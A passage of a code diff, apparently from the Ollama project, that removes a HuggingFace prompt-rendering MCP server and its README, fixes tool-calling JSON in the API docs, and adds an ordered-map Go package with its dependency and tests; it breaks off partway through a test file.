|
||||
Model Context Protocol (MCP) server for rendering conversation messages into
|
||||
model-specific prompt strings using HuggingFace tokenizer chat templates.
|
||||
|
||||
## Requirements
|
||||
|
||||
- [uv](https://docs.astral.sh/uv/) - Fast Python package installer
|
||||
|
||||
## Usage
|
||||
|
||||
### MCP Server Mode
|
||||
|
||||
Run the MCP server over stdio for use with MCP clients:
|
||||
|
||||
```bash
|
||||
uv run cmd/prompt-rendering/server.py --mcp
|
||||
```
|
||||
|
||||
Add to your MCP client configuration (e.g., for Claude Desktop):
|
||||
|
||||
```json
|
||||
{
|
||||
"mcpServers": {
|
||||
"huggingface-prompt-renderer": {
|
||||
"command": "uv",
|
||||
"args": [
|
||||
"run",
|
||||
"--directory",
|
||||
"<path-to-ollama-repo>",
|
||||
"cmd/prompt-rendering/server.py",
|
||||
"--mcp"
|
||||
]
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### FastAPI Server Mode
|
||||
|
||||
Start a FastAPI server for manual HTTP testing:
|
||||
|
||||
```bash
|
||||
# Start on default port 8000
|
||||
uv run cmd/prompt-rendering/server.py --host 0.0.0.0 --port 8000
|
||||
|
||||
# Start on custom port
|
||||
uv run cmd/prompt-rendering/server.py --host 0.0.0.0 --port 9000
|
||||
```
|
||||
|
||||
#### Endpoints
|
||||
|
||||
| Method | Path | Description |
|
||||
|--------|------|-------------|
|
||||
| POST | `/generate-prompt` | Generate prompt from messages |
|
||||
| GET | `/health` | Health check |
|
||||
|
||||
### Test with curl
|
||||
|
||||
```bash
|
||||
# Basic user message
|
||||
curl -X POST http://localhost:8000/generate-prompt \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"messages": [{"role": "user", "content": "Hello!"}]
|
||||
}'
|
||||
|
||||
# With tools
|
||||
curl -X POST http://localhost:8000/generate-prompt \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"messages": [
|
||||
{"role": "system", "content": "You are a helpful assistant."},
|
||||
{"role": "user", "content": "What is the weather?"}
|
||||
],
|
||||
"model": "Qwen/Qwen3-Coder-480B-A35B-Instruct",
|
||||
"tools": [{
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": "get_weather",
|
||||
"description": "Get the current weather",
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"required": ["location"],
|
||||
"properties": {
|
||||
"location": {"type": "string", "description": "The city"}
|
||||
}
|
||||
}
|
||||
}
|
||||
}]
|
||||
}'
|
||||
|
||||
# With tool calls
|
||||
curl -X POST http://localhost:8000/generate-prompt \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"messages": [
|
||||
{"role": "user", "content": "What is the weather in SF?"},
|
||||
{
|
||||
"role": "assistant",
|
||||
"tool_calls": [{
|
||||
"id": "call_1",
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": "get_weather",
|
||||
"arguments": {"location": "San Francisco"}
|
||||
}
|
||||
}]
|
||||
},
|
||||
{"role": "tool", "content": "{\"temperature\": 68}", "tool_call_id": "call_1"}
|
||||
],
|
||||
"tools": [{
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": "get_weather",
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": {"location": {"type": "string"}}
|
||||
}
|
||||
}
|
||||
}]
|
||||
}'
|
||||
```
|
||||
|
||||
## Supported Message Formats
|
||||
|
||||
The server supports multiple message formats:
|
||||
|
||||
| Format | Description |
|
||||
|--------|-------------|
|
||||
| OpenAI | Standard `role`, `content`, `tool_calls`, `tool_call_id` |
|
||||
| OLMo | Adds `functions` and `function_calls` fields |
|
||||
| DeepSeek | Tool call arguments must be JSON strings |
|
||||
|
||||
## Tool Support
|
||||
|
||||
| Setting | Description |
|
||||
|---------|-------------|
|
||||
| `inject_tools_as_functions=true` | Injects tools into system message as `functions` key (OLMo-style) |
|
||||
| `inject_tools_as_functions=false` | Passes tools separately to `apply_chat_template` (standard transformers) |
|
||||
|
||||
## Models
|
||||
|
||||
The server uses HuggingFace's `transformers` library and supports any model
|
||||
with a chat template. Default: `Qwen/Qwen3-Coder-480B-A35B-Instruct`
|
||||
|
||||
## Dependencies
|
||||
|
||||
The script uses PEP 723 inline dependency metadata. When run with `uv`,
|
||||
dependencies are automatically installed into an isolated environment:
|
||||
|
||||
- `fastapi` - Web framework
|
||||
- `uvicorn` - ASGI server
|
||||
- `transformers` - HuggingFace tokenizer
|
||||
- `jinja2` - Template engine
|
||||
- `mcp` - Model Context Protocol
|
||||
|
|
@ -1,311 +0,0 @@
|
|||
#!/usr/bin/env python3
|
||||
# /// script
|
||||
# requires-python = ">=3.10"
|
||||
# dependencies = [
|
||||
# "fastapi",
|
||||
# "uvicorn",
|
||||
# "transformers",
|
||||
# "jinja2",
|
||||
# "mcp",
|
||||
# ]
|
||||
# ///
|
||||
"""
|
||||
HuggingFace Prompt Renderer MCP Server
|
||||
|
||||
Model Context Protocol (MCP) server for rendering conversation messages into
|
||||
model-specific prompt strings using HuggingFace tokenizer chat templates.
|
||||
|
||||
Usage:
|
||||
# Run MCP server over stdio
|
||||
uv run cmd/prompt-rendering/server.py --mcp
|
||||
|
||||
# Start FastAPI server for manual testing
|
||||
uv run cmd/prompt-rendering/server.py --host 0.0.0.0 --port 8000
|
||||
|
||||
# Test with curl
|
||||
curl -X POST http://localhost:8000/generate-prompt \\
|
||||
-H "Content-Type: application/json" \\
|
||||
-d '{"messages": [{"role": "user", "content": "Hello!"}]}'
|
||||
"""
|
||||
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
import argparse
|
||||
import json
|
||||
|
||||
from fastapi import FastAPI, HTTPException
|
||||
from pydantic import BaseModel
|
||||
import uvicorn
|
||||
from transformers import AutoTokenizer
|
||||
|
||||
try:
|
||||
from mcp.server.fastmcp import FastMCP
|
||||
except Exception:
|
||||
FastMCP = None
|
||||
|
||||
# Cache for tokenizers to avoid reloading
|
||||
_tokenizer_cache: Dict[str, Any] = {}
|
||||
|
||||
|
||||
class Message(BaseModel):
|
||||
role: str
|
||||
content: Optional[str] = None
|
||||
tool_calls: Optional[List[Dict[str, Any]]] = None
|
||||
tool_call_id: Optional[str] = None
|
||||
functions: Optional[str] = None # For OLMo-style function passing
|
||||
function_calls: Optional[str] = None # For OLMo-style function call results
|
||||
|
||||
|
||||
class GeneratePromptRequest(BaseModel):
|
||||
messages: List[Message]
|
||||
model: str
|
||||
tools: Optional[List[Dict[str, Any]]] = None
|
||||
# Whether to inject tools into system message as 'functions' key (for OLMo-style templates)
|
||||
inject_tools_as_functions: Optional[bool] = True
|
||||
|
||||
|
||||
class GeneratePromptResponse(BaseModel):
|
||||
prompt: str
|
||||
model: str
|
||||
|
||||
|
||||
# FastAPI app
|
||||
app = FastAPI(title="HuggingFace Prompt Generator", version="1.0.0")
|
||||
|
||||
|
||||
def get_tokenizer(model_name: str) -> Any:
|
||||
"""Get or create tokenizer for the given model."""
|
||||
if model_name not in _tokenizer_cache:
|
||||
_tokenizer_cache[model_name] = AutoTokenizer.from_pretrained(
|
||||
model_name, trust_remote_code=True
|
||||
)
|
||||
return _tokenizer_cache[model_name]
|
||||
|
||||
|
||||
def is_deepseek_model(model_name: str) -> bool:
|
||||
"""Check if this is a DeepSeek model."""
|
||||
return "deepseek" in model_name.lower()
|
||||
|
||||
|
||||
def normalize_messages(
|
||||
raw_messages: List[Any],
|
||||
tools: Optional[List[Dict[str, Any]]],
|
||||
inject_tools_as_functions: bool,
|
||||
model: str,
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""Normalize messages for different chat template formats."""
|
||||
messages: List[Dict[str, Any]] = []
|
||||
tools_json = json.dumps(tools) if tools else None
|
||||
is_deepseek = is_deepseek_model(model)
|
||||
|
||||
for msg in raw_messages:
|
||||
message = msg if isinstance(msg, Message) else Message(**msg)
|
||||
message_dict: Dict[str, Any] = {"role": message.role, "content": None}
|
||||
|
||||
if message.content is not None:
|
||||
message_dict["content"] = message.content
|
||||
|
||||
# Handle explicit functions field (OLMo-style)
|
||||
if message.functions is not None:
|
||||
message_dict["functions"] = message.functions
|
||||
# Inject tools into system message as 'functions' (for OLMo templates)
|
||||
elif inject_tools_as_functions and message.role == "system" and tools_json:
|
||||
message_dict["functions"] = tools_json
|
||||
|
||||
# Handle explicit function_calls field (OLMo-style)
|
||||
if message.function_calls is not None:
|
||||
message_dict["function_calls"] = message.function_calls
|
||||
# Convert tool_calls for templates
|
||||
elif message.tool_calls is not None:
|
||||
if is_deepseek:
|
||||
# DeepSeek format: arguments must be a JSON string
|
||||
tool_calls = []
|
||||
for tool_call in message.tool_calls:
|
||||
tc = {
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": tool_call["function"]["name"],
|
||||
"arguments": json.dumps(tool_call["function"]["arguments"])
|
||||
if isinstance(tool_call["function"]["arguments"], dict)
|
||||
else tool_call["function"]["arguments"],
|
||||
},
|
||||
}
|
||||
tool_calls.append(tc)
|
||||
message_dict["tool_calls"] = tool_calls
|
||||
elif inject_tools_as_functions:
|
||||
# Convert to OLMo function_calls format
|
||||
message_dict["function_calls"] = json.dumps(message.tool_calls)
|
||||
else:
|
||||
# Standard transformers format
|
||||
tool_calls = []
|
||||
for tool_call in message.tool_calls:
|
||||
tool_call_copy = tool_call.copy()
|
||||
if (
|
||||
"function" in tool_call_copy
|
||||
and "arguments" in tool_call_copy["function"]
|
||||
):
|
||||
try:
|
||||
tool_call_copy["function"]["arguments"] = json.loads(
|
||||
tool_call_copy["function"]["arguments"]
|
||||
)
|
||||
except (json.JSONDecodeError, TypeError):
|
||||
pass
|
||||
tool_calls.append(tool_call_copy)
|
||||
message_dict["tool_calls"] = tool_calls
|
||||
|
||||
if message.tool_call_id is not None:
|
||||
message_dict["tool_call_id"] = message.tool_call_id
|
||||
|
||||
messages.append(message_dict)
|
||||
|
||||
return messages
|
||||
|
||||
|
||||
def build_prompt(
|
||||
raw_messages: List[Any],
|
||||
model: str,
|
||||
tools: Optional[List[Dict[str, Any]]],
|
||||
inject_tools_as_functions: bool,
|
||||
) -> str:
|
||||
"""Build prompt from messages using the model's chat template."""
|
||||
messages = normalize_messages(
|
||||
raw_messages=raw_messages,
|
||||
tools=tools,
|
||||
inject_tools_as_functions=inject_tools_as_functions,
|
||||
model=model,
|
||||
)
|
||||
|
||||
tokenizer = get_tokenizer(model)
|
||||
|
||||
# For OLMo-style templates, don't pass tools separately (they're in messages)
|
||||
if tools and not inject_tools_as_functions:
|
||||
prompt = tokenizer.apply_chat_template(
|
||||
messages,
|
||||
tools=tools,
|
||||
tokenize=False,
|
||||
add_generation_prompt=True,
|
||||
)
|
||||
else:
|
||||
prompt = tokenizer.apply_chat_template(
|
||||
messages,
|
||||
tokenize=False,
|
||||
add_generation_prompt=True,
|
||||
)
|
||||
|
||||
return prompt
|
||||
|
||||
|
||||
@app.post("/generate-prompt", response_model=GeneratePromptResponse)
|
||||
async def generate_prompt(request: GeneratePromptRequest):
|
||||
"""
|
||||
Generate a prompt from messages using the specified model's chat template.
|
||||
Optionally includes tool definitions if provided.
|
||||
"""
|
||||
try:
|
||||
prompt = build_prompt(
|
||||
raw_messages=request.messages,
|
||||
model=request.model,
|
||||
tools=request.tools,
|
||||
inject_tools_as_functions=request.inject_tools_as_functions,
|
||||
)
|
||||
return GeneratePromptResponse(prompt=prompt, model=request.model)
|
||||
|
||||
except Exception as e:
|
||||
import traceback
|
||||
|
||||
traceback.print_exc()
|
||||
raise HTTPException(
|
||||
status_code=500,
|
||||
detail=f"Failed to generate prompt: {str(e)}",
|
||||
)
|
||||
|
||||
|
||||
@app.get("/health")
|
||||
async def health_check():
|
||||
"""Health check endpoint."""
|
||||
return {"status": "healthy"}
|
||||
|
||||
|
||||
if FastMCP is not None:
|
||||
mcp = FastMCP("huggingface-prompt-renderer")
|
||||
|
||||
@mcp.tool()
|
||||
def generate_prompt_tool(
|
||||
messages: List[Dict[str, Any]],
|
||||
model: str = "Qwen/Qwen3-Coder-480B-A35B-Instruct",
|
||||
tools: Optional[List[Dict[str, Any]]] = None,
|
||||
inject_tools_as_functions: bool = True,
|
||||
) -> Dict[str, str]:
|
||||
"""
|
||||
Render conversation messages into a model-specific prompt string using HuggingFace tokenizer chat templates.
|
||||
|
||||
This tool takes a list of message objects and applies the target model's chat template to produce
|
||||
the exact prompt string that would be fed to the model. It handles various message formats including
|
||||
standard OpenAI-style, OLMo-style (functions/function_calls), and DeepSeek-specific formatting.
|
||||
|
||||
Use this tool to:
|
||||
- Verify that a model's chat template correctly formats your conversation
|
||||
- Test edge cases: tool calling, tool responses, interleaved thinking and tool calls, multiple tools in single response
|
||||
- Compare prompt output across different models to understand template differences
|
||||
- Debug issues with message formatting that cause unexpected model behavior
|
||||
|
||||
Message format supports:
|
||||
- role: "user", "assistant", "system", "tool"
|
||||
- content: string content of the message
|
||||
- tool_calls: list of tool call objects (OpenAI format: {type, function: {name, arguments}})
|
||||
- tool_call_id: for tool role messages, references the call being responded to
|
||||
- functions: optional field for OLMo-style tool definitions
|
||||
- function_calls: optional field for OLMo-style tool call results
|
||||
|
||||
Parameters:
|
||||
- messages: List of message dictionaries forming the conversation
|
||||
- model: HuggingFace model identifier (default: Qwen/Qwen3-Coder-480B-A35B-Instruct)
|
||||
- tools: Optional list of tool/function definitions for function calling models
|
||||
- inject_tools_as_functions: If True, injects tools into system message as 'functions' key (OLMo-style). If False, passes tools separately to apply_chat_template.
|
||||
|
||||
Returns: Dictionary with 'prompt' (rendered string) and 'model' keys.
|
||||
|
||||
Recommended test cases:
|
||||
1. Simple conversation: user -> assistant
|
||||
2. Tool calling: user -> assistant with tool_call -> tool response -> assistant
|
||||
3. Multiple tool calls in one assistant message
|
||||
4. Multiple tool responses interleaved with assistant reasoning
|
||||
5. Nested tool calls (assistant calls tool, uses result to call another)
|
||||
6. System message with tool definitions
|
||||
7. Empty or None content in messages
|
||||
8. Very long messages to test truncation handling
|
||||
"""
|
||||
prompt = build_prompt(
|
||||
raw_messages=messages,
|
||||
model=model,
|
||||
tools=tools,
|
||||
inject_tools_as_functions=inject_tools_as_functions,
|
||||
)
|
||||
return {"prompt": prompt, "model": model}
|
||||
else:
|
||||
mcp = None
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(
|
||||
description="HuggingFace Prompt Renderer MCP Server",
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=__doc__,
|
||||
)
|
||||
parser.add_argument(
|
||||
"--mcp", action="store_true", help="Run MCP server over stdio"
|
||||
)
|
||||
parser.add_argument("--host", default="0.0.0.0", help="FastAPI host")
|
||||
parser.add_argument("--port", type=int, default=8000, help="FastAPI port")
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.mcp:
|
||||
if mcp is None:
|
||||
raise RuntimeError("MCP server requested but mcp is not installed.")
|
||||
mcp.run()
|
||||
else:
|
||||
uvicorn.run(app, host=args.host, port=args.port)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
|
|
@ -895,11 +895,11 @@ curl http://localhost:11434/api/chat -d '{
|
|||
"tool_calls": [
|
||||
{
|
||||
"function": {
|
||||
"name": "get_temperature",
|
||||
"name": "get_weather",
|
||||
"arguments": {
|
||||
"city": "Toronto"
|
||||
}
|
||||
},
|
||||
}
|
||||
}
|
||||
]
|
||||
},
|
||||
|
|
@ -907,7 +907,7 @@ curl http://localhost:11434/api/chat -d '{
|
|||
{
|
||||
"role": "tool",
|
||||
"content": "11 degrees celsius",
|
||||
"tool_name": "get_temperature",
|
||||
"tool_name": "get_weather"
|
||||
}
|
||||
],
|
||||
"stream": false,
|
||||
|
|
|
|||
|
|
@ -277,6 +277,8 @@ curl -X POST http://localhost:11434/v1/chat/completions \
|
|||
|
||||
### `/v1/responses`
|
||||
|
||||
> Note: Added in Ollama v0.13.3
|
||||
|
||||
Ollama supports the [OpenAI Responses API](https://platform.openai.com/docs/api-reference/responses). Only the non-stateful flavor is supported (i.e., there is no `previous_response_id` or `conversation` support).
|
||||
|
||||
#### Supported features
|
||||
|
|
|
|||
|
|
@ -36,7 +36,6 @@ Provide an `images` array. SDKs accept file paths, URLs or raw bytes while the R
|
|||
}],
|
||||
"stream": false
|
||||
}'
|
||||
"
|
||||
```
|
||||
</Tab>
|
||||
<Tab title="Python">
|
||||
|
|
|
|||
4
go.mod
4
go.mod
|
|
@ -28,6 +28,7 @@ require (
|
|||
github.com/nlpodyssey/gopickle v0.3.0
|
||||
github.com/pdevine/tensor v0.0.0-20240510204454-f88f4562727c
|
||||
github.com/tkrajina/typescriptify-golang-structs v0.2.0
|
||||
github.com/wk8/go-ordered-map/v2 v2.1.8
|
||||
golang.org/x/image v0.22.0
|
||||
golang.org/x/mod v0.30.0
|
||||
golang.org/x/tools v0.38.0
|
||||
|
|
@ -36,6 +37,8 @@ require (
|
|||
|
||||
require (
|
||||
github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40 // indirect
|
||||
github.com/bahlo/generic-list-go v0.2.0 // indirect
|
||||
github.com/buger/jsonparser v1.1.1 // indirect
|
||||
github.com/bytedance/sonic/loader v0.1.1 // indirect
|
||||
github.com/chewxy/hm v1.0.0 // indirect
|
||||
github.com/chewxy/math32 v1.11.0 // indirect
|
||||
|
|
@ -45,6 +48,7 @@ require (
|
|||
github.com/gogo/protobuf v1.3.2 // indirect
|
||||
github.com/google/flatbuffers v24.3.25+incompatible // indirect
|
||||
github.com/kr/text v0.2.0 // indirect
|
||||
github.com/mailru/easyjson v0.7.7 // indirect
|
||||
github.com/pkg/errors v0.9.1 // indirect
|
||||
github.com/pmezard/go-difflib v1.0.0 // indirect
|
||||
github.com/rivo/uniseg v0.2.0 // indirect
|
||||
|
|
|
|||
9
go.sum
9
go.sum
|
|
@ -14,7 +14,11 @@ github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40 h1:q4dksr6IC
|
|||
github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40/go.mod h1:Q7yQnSMnLvcXlZ8RV+jwz/6y1rQTqbX6C82SndT52Zs=
|
||||
github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0 h1:jfIu9sQUG6Ig+0+Ap1h4unLjW6YQJpKZVmUzxsD4E/Q=
|
||||
github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0/go.mod h1:t2tdKJDJF9BV14lnkjHmOQgcvEKgtqs5a1N3LNdJhGE=
|
||||
github.com/bahlo/generic-list-go v0.2.0 h1:5sz/EEAK+ls5wF+NeqDpk5+iNdMDXrh3z3nPnH1Wvgk=
|
||||
github.com/bahlo/generic-list-go v0.2.0/go.mod h1:2KvAjgMlE5NNynlg/5iLrrCCZ2+5xWbdbCW3pNTGyYg=
|
||||
github.com/boombuler/barcode v1.0.0/go.mod h1:paBWMcWSl3LHKBqUq+rly7CNSldXjb2rDl3JlRe0mD8=
|
||||
github.com/buger/jsonparser v1.1.1 h1:2PnMjfWD7wBILjqQbt530v576A/cAbQvEW9gGIpYMUs=
|
||||
github.com/buger/jsonparser v1.1.1/go.mod h1:6RYKKt7H4d4+iWqouImQ9R2FZql3VbhNgx27UK13J/0=
|
||||
github.com/bytedance/sonic v1.11.6 h1:oUp34TzMlL+OY1OUWxHqsdkgC/Zfc85zGqw9siXjrc0=
|
||||
github.com/bytedance/sonic v1.11.6/go.mod h1:LysEHSvpvDySVdC2f87zGWf6CIKJcAvqab1ZaiQtds4=
|
||||
github.com/bytedance/sonic/loader v0.1.1 h1:c+e5Pt1k/cy5wMveRDyk2X4B9hF4g7an8N3zCYjJFNM=
|
||||
|
|
@ -123,6 +127,7 @@ github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+
|
|||
github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw=
|
||||
github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=
|
||||
github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=
|
||||
github.com/josharian/intern v1.0.0/go.mod h1:5DoeVV0s6jJacbCEi61lwdGj/aVlrQvzHFFd8Hwg//Y=
|
||||
github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
|
||||
github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo=
|
||||
github.com/jung-kurt/gofpdf v1.0.0/go.mod h1:7Id9E/uU8ce6rXgefFLlgrJj/GYY22cpxn+r32jIOes=
|
||||
|
|
@ -143,6 +148,8 @@ github.com/ledongthuc/pdf v0.0.0-20250511090121-5959a4027728 h1:QwWKgMY28TAXaDl+
|
|||
github.com/ledongthuc/pdf v0.0.0-20250511090121-5959a4027728/go.mod h1:1fEHWurg7pvf5SG6XNE5Q8UZmOwex51Mkx3SLhrW5B4=
|
||||
github.com/leodido/go-urn v1.4.0 h1:WT9HwE9SGECu3lg4d/dIA+jxlljEa1/ffXKmRjqdmIQ=
|
||||
github.com/leodido/go-urn v1.4.0/go.mod h1:bvxc+MVxLKB4z00jd1z+Dvzr47oO32F/QSNjSBOlFxI=
|
||||
github.com/mailru/easyjson v0.7.7 h1:UGYAvKxe3sBsEDzO8ZeWOSlIQfWFlxbzLZe7hwFURr0=
|
||||
github.com/mailru/easyjson v0.7.7/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc=
|
||||
github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
|
||||
github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
|
||||
github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
|
||||
|
|
@ -207,6 +214,8 @@ github.com/twitchyliquid64/golang-asm v0.15.1 h1:SU5vSMR7hnwNxj24w34ZyCi/FmDZTkS
|
|||
github.com/twitchyliquid64/golang-asm v0.15.1/go.mod h1:a1lVb/DtPvCB8fslRZhAngC2+aY1QWCk3Cedj/Gdt08=
|
||||
github.com/ugorji/go/codec v1.2.12 h1:9LC83zGrHhuUA9l16C9AHXAqEV/2wBQ4nkvumAE65EE=
|
||||
github.com/ugorji/go/codec v1.2.12/go.mod h1:UNopzCgEMSXjBc6AOMqYvWC1ktqTAfzJZUZgYf6w6lg=
|
||||
github.com/wk8/go-ordered-map/v2 v2.1.8 h1:5h/BUHu93oj4gIdvHHHGsScSTMijfx5PeYkE/fJgbpc=
|
||||
github.com/wk8/go-ordered-map/v2 v2.1.8/go.mod h1:5nJHM5DyteebpVlHnWMV0rPz6Zp7+xBAnxjb1X5vnTw=
|
||||
github.com/x448/float16 v0.8.4 h1:qLwI1I70+NjRFUR3zs1JPUCgaCXSh3SW62uAKT1mSBM=
|
||||
github.com/x448/float16 v0.8.4/go.mod h1:14CWIYCyZA/cWjXOioeEpHeN/83MdbZDRQHoFcYsOfg=
|
||||
github.com/xtgo/set v1.0.0 h1:6BCNBRv3ORNDQ7fyoJXRv+tstJz3m1JVFQErfeZz2pY=
|
||||
|
|
|
|||
|
|
@ -11,6 +11,15 @@ import (
|
|||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests)
|
||||
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||
props := api.NewToolPropertiesMap()
|
||||
for k, v := range m {
|
||||
props.Set(k, v)
|
||||
}
|
||||
return props
|
||||
}
|
||||
|
||||
func TestAPIToolCalling(t *testing.T) {
|
||||
initialTimeout := 60 * time.Second
|
||||
streamTimeout := 60 * time.Second
|
||||
|
|
@ -57,12 +66,12 @@ func TestAPIToolCalling(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"location"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The city and state, e.g. San Francisco, CA",
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
|
|||
|
|
@ -0,0 +1,94 @@
|
|||
// Package orderedmap provides a generic ordered map that maintains insertion order.
|
||||
// It wraps github.com/wk8/go-ordered-map/v2 to encapsulate the dependency.
|
||||
package orderedmap
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"iter"
|
||||
|
||||
orderedmap "github.com/wk8/go-ordered-map/v2"
|
||||
)
|
||||
|
||||
// Map is a generic ordered map that maintains insertion order.
|
||||
type Map[K comparable, V any] struct {
|
||||
om *orderedmap.OrderedMap[K, V]
|
||||
}
|
||||
|
||||
// New creates a new empty ordered map.
|
||||
func New[K comparable, V any]() *Map[K, V] {
|
||||
return &Map[K, V]{
|
||||
om: orderedmap.New[K, V](),
|
||||
}
|
||||
}
|
||||
|
||||
// Get retrieves a value by key.
|
||||
func (m *Map[K, V]) Get(key K) (V, bool) {
|
||||
if m == nil || m.om == nil {
|
||||
var zero V
|
||||
return zero, false
|
||||
}
|
||||
return m.om.Get(key)
|
||||
}
|
||||
|
||||
// Set sets a key-value pair. If the key already exists, its value is updated
|
||||
// but its position in the iteration order is preserved. If the key is new,
|
||||
// it is appended to the end.
|
||||
func (m *Map[K, V]) Set(key K, value V) {
|
||||
if m == nil {
|
||||
return
|
||||
}
|
||||
if m.om == nil {
|
||||
m.om = orderedmap.New[K, V]()
|
||||
}
|
||||
m.om.Set(key, value)
|
||||
}
|
||||
|
||||
// Len returns the number of entries.
|
||||
func (m *Map[K, V]) Len() int {
|
||||
if m == nil || m.om == nil {
|
||||
return 0
|
||||
}
|
||||
return m.om.Len()
|
||||
}
|
||||
|
||||
// All returns an iterator over all key-value pairs in insertion order.
|
||||
func (m *Map[K, V]) All() iter.Seq2[K, V] {
|
||||
return func(yield func(K, V) bool) {
|
||||
if m == nil || m.om == nil {
|
||||
return
|
||||
}
|
||||
for pair := m.om.Oldest(); pair != nil; pair = pair.Next() {
|
||||
if !yield(pair.Key, pair.Value) {
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ToMap converts to a regular Go map.
|
||||
// Note: The resulting map does not preserve order.
|
||||
func (m *Map[K, V]) ToMap() map[K]V {
|
||||
if m == nil || m.om == nil {
|
||||
return nil
|
||||
}
|
||||
result := make(map[K]V, m.om.Len())
|
||||
for pair := m.om.Oldest(); pair != nil; pair = pair.Next() {
|
||||
result[pair.Key] = pair.Value
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// MarshalJSON implements json.Marshaler. The JSON output preserves key order.
|
||||
func (m *Map[K, V]) MarshalJSON() ([]byte, error) {
|
||||
if m == nil || m.om == nil {
|
||||
return []byte("null"), nil
|
||||
}
|
||||
return json.Marshal(m.om)
|
||||
}
|
||||
|
||||
// UnmarshalJSON implements json.Unmarshaler. The insertion order matches the
|
||||
// order of keys in the JSON input.
|
||||
func (m *Map[K, V]) UnmarshalJSON(data []byte) error {
|
||||
m.om = orderedmap.New[K, V]()
|
||||
return json.Unmarshal(data, &m.om)
|
||||
}
|
||||
|
|
@ -0,0 +1,348 @@
|
|||
package orderedmap
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"slices"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestMap_BasicOperations(t *testing.T) {
|
||||
m := New[string, int]()
|
||||
|
||||
// Test empty map
|
||||
if m.Len() != 0 {
|
||||
t.Errorf("expected Len() = 0, got %d", m.Len())
|
||||
}
|
||||
v, ok := m.Get("a")
|
||||
if ok {
|
||||
t.Error("expected Get on empty map to return false")
|
||||
}
|
||||
if v != 0 {
|
||||
t.Errorf("expected zero value, got %d", v)
|
||||
}
|
||||
|
||||
// Test Set and Get
|
||||
m.Set("a", 1)
|
||||
m.Set("b", 2)
|
||||
m.Set("c", 3)
|
||||
|
||||
if m.Len() != 3 {
|
||||
t.Errorf("expected Len() = 3, got %d", m.Len())
|
||||
}
|
||||
|
||||
v, ok = m.Get("a")
|
||||
if !ok || v != 1 {
|
||||
t.Errorf("expected Get(a) = (1, true), got (%d, %v)", v, ok)
|
||||
}
|
||||
|
||||
v, ok = m.Get("b")
|
||||
if !ok || v != 2 {
|
||||
t.Errorf("expected Get(b) = (2, true), got (%d, %v)", v, ok)
|
||||
}
|
||||
|
||||
v, ok = m.Get("c")
|
||||
if !ok || v != 3 {
|
||||
t.Errorf("expected Get(c) = (3, true), got (%d, %v)", v, ok)
|
||||
}
|
||||
|
||||
// Test updating existing key preserves position
|
||||
m.Set("a", 10)
|
||||
v, ok = m.Get("a")
|
||||
if !ok || v != 10 {
|
||||
t.Errorf("expected Get(a) = (10, true), got (%d, %v)", v, ok)
|
||||
}
|
||||
if m.Len() != 3 {
|
||||
t.Errorf("expected Len() = 3 after update, got %d", m.Len())
|
||||
}
|
||||
}
|
||||
|
||||
func TestMap_InsertionOrderPreserved(t *testing.T) {
|
||||
m := New[string, int]()
|
||||
|
||||
// Insert in non-alphabetical order
|
||||
m.Set("z", 1)
|
||||
m.Set("a", 2)
|
||||
m.Set("m", 3)
|
||||
m.Set("b", 4)
|
||||
|
||||
// Verify iteration order matches insertion order
|
||||
var keys []string
|
||||
var values []int
|
||||
